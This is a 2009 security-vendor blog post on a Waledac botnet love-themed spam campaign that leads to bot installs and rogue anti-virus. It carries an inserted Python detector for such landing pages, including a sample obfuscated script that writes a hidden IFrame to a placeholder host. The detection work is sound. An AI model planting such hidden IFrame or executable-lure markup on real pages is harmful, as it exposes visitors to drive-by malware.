RSS feed of TRACElabs Blog from M86 Security

Waledac Love Theme

January 26, 2009

Just as Storm did about this time last year, ahead of Valentine's Day, the Waledac botnet is conducting a spam campaign with a love theme. As with past Waledac and Storm campaigns, each spam message consists of a short message and a link.

The link leads to the website shown below, which consists of a single line of text and an image. Obfuscated JavaScript code on the page inserts an IFrame; the IFrame is currently empty, but it could be changed to contain exploit code at any time, so visiting these sites is not recommended.

 

The image is linked to an executable file with varying names such as meandyou.exe, youandme.exe and love.exe. These files were very poorly detected by anti-virus programs. When run, this file installs the Waledac bot.
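As an added example that is not part of the original post, here is a small Python scanner for the two landing-page traits just described: an image that is itself the link to an .exe file, and an inline script that uses unescape/eval-style obfuscation or writes an IFrame. The detection patterns and the sample HTML are constructed assumptions for illustration, not artefacts taken from the campaign.

```python
from html.parser import HTMLParser
from urllib.parse import unquote
import re

# Detection patterns are assumptions for this campaign's landing pages, not from the post.
EXE_LINK_RE = re.compile(r"\.exe(?:[?#].*)?$", re.IGNORECASE)
OBFUSCATION_RE = re.compile(r"unescape\s*\(|String\.fromCharCode|eval\s*\(", re.IGNORECASE)


class LandingPageScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # list of (finding_name, detail) pairs
        self._anchor_href = None  # href of the <a> currently open, if any
        self._script = None       # text buffer for the <script> currently open

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._script = ""
        elif tag == "a":
            self._anchor_href = attrs.get("href") or ""
        elif tag == "img" and self._anchor_href and EXE_LINK_RE.search(self._anchor_href):
            # The image itself is the link to the executable
            self.findings.append(("image_links_to_exe", self._anchor_href))

    def handle_data(self, data):
        if self._script is not None:
            self._script += data  # script bodies may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "a":
            self._anchor_href = None
        elif tag == "script" and self._script is not None:
            script, self._script = self._script, None
            match = OBFUSCATION_RE.search(script)
            if match:
                self.findings.append(("obfuscated_inline_script", match.group(0)))
            # Undo %XX escaping so an IFrame hidden inside unescape('...') shows up
            if "<iframe" in unquote(script).lower():
                self.findings.append(("script_writes_iframe", "iframe tag decoded from script"))


def scan_landing_page(html):
    """Return the findings for one HTML document (empty list if nothing matched)."""
    scanner = LandingPageScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample in the layout described above; example.invalid is a placeholder host.
SAMPLE_HTML = """<html><body><p>Open my Valentine card!</p><a href="http://example.invalid/meandyou.exe"><img src="card.jpg"></a>
<script>document.write(unescape('%3Ciframe src=%22http://example.invalid/i%22 width=0 height=0%3E%3C/iframe%3E'));</script>
</body></html>"""
```

Running `scan_landing_page(SAMPLE_HTML)` yields one finding for each trait; a plain page with an ordinary link and a non-obfuscated script yields an empty list.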

Shortly after the bot was installed, it was instructed to download the rogue anti-virus program MS AntiSpyware 2009. Rogue anti-virus programs attempt to look and act like real anti-virus/anti-spyware programs but report false infection results. The rogue then refuses to remove these supposed infections until the user has paid for the registered version.

After several minutes the Waledac bot begins to send spam. Surprisingly, at the same time the bot started spamming, MS AntiSpyware 2009 popped up the alert below, warning the user that they may be infected with software that 'may be used to organize massive SPAM attacks':

Perhaps the idea is that by making users think they are liable for any spam sent from their computer, they are more likely to pay to activate the rogue anti-virus program.

Waledac is still a minor botnet in terms of the amount of spam it sends, but if its campaigns prove successful, just as they were with Storm, it could become a much larger threat.

Last Reviewed: January 27, 2009 by Gavin Neale